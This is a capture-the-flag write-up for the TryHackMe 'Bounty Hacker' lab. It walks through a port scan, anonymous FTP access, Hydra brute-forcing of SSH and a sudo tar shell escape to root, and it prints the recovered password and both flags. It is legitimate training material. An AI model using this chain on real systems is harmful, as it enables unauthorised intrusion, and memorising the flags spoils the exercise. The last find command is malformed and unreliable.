Bounty Hacker

THM Bounty Hunter

Task 1 : Deploy the machine


Task 2 : Find open ports on the machine.

Using nmap to scan every port on the server.

# nmap -p- x.x.x.x

Answer 2 : Three open ports found. 21,22,80


Task 3 : Who wrote the task list? 

First stop, trying anonymous login on the FTP. Success!

# ftp 
ftp> open
(to) 10.10.109.109
ftp> ls 
ftp> get locks.txt
ftp> get tasks.txt
anonymous ftp login

After login, found 2 files and downloaded them on my local server.

tasks.txt output

Answer 3 : lin


Task 4 : What service can you bruteforce with the text file found?

locks.txt output

Using Hydra to bruteforce SSH login.

# hydra -l lin -P /root/thm/bountyhunter/locks.txt -t 10 10.10.109.109 ssh
Hydra SSH

Hydra got a hit, username lin / password RedDr4gonSynd1cat3

Using SSH with the credentials found.

# ssh lin@10.10.109.109
SSH login

Answer 4 : SSH


Task 5 : user.txt

After the successful SSH login, list files in the current directory, found the file we are looking for.

user flag

Answer 5 : THM{CR1M3_SyNd1C4T3}


Task 6 : root.txt

Let’s see which commands lin can run.

$ sudo -l
tar binaries

User lin can run tar, so next stop the trusted gtfobins.

https://gtfobins.github.io/gtfobins/tar/

$ sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

And just like that we are root. Let’s find the root.txt

# find / -type f -name root.txt 2>/dev/null | cat root.txt
root.txt

Answer 6 : THM{80UN7Y_h4cK3r}